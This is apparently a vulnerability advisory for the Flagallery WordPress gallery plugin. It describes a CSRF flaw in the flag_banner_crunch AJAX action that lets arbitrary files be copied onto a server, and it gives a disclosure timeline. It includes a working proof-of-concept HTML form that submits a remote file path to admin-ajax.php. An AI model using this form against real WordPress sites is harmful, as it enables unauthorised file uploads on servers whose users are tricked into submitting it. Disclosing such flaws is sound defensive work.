Gallery – Flagallery Photo Portfolio [CSRF → File Upload]
Gallery – Flagallery Photo Portfolio WordPress plugin suffers from a CSRF vulnerability that could lead to arbitrary file uploads.
Description
Plugin implements the AJAX action flag_banner_crunch which calls the function flag_banner_crunch. This function doesn’t take any anti-CSRF measures thus making it susceptible to those kind of attacks.
Function will copy a file defined in the $_POST['path'] param. A malicious actor can leverage the CSRF vulnerability to copy arbitrary files on the infected server from a remote or local origin.
Note that uploads are limited to allowed filetypes by default. Even so if the tricked user has the unfiltered_uploads capability then those restrictions won’t apply.
PoC
<form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="flag_banner_crunch">
<input type="text" name="path" value="http://wp-plugin-csrf.dev/mal.html">
<button type="submit" value="Submit">Submit</button>
</form>
INFO
- 25 May 2019
- Pan Vag
- codeasily.com
- Gallery – Flagallery Photo Portfolio
- 5.3.6
- WordPress 5.1.1
TIMELINE
- 2019-03-17:
Discovered - 2019-03-17:
Vendor notified through contact form on codeasily.com - 2019-03-22:
Vendor replied - 2019-03-23:
Vendor received details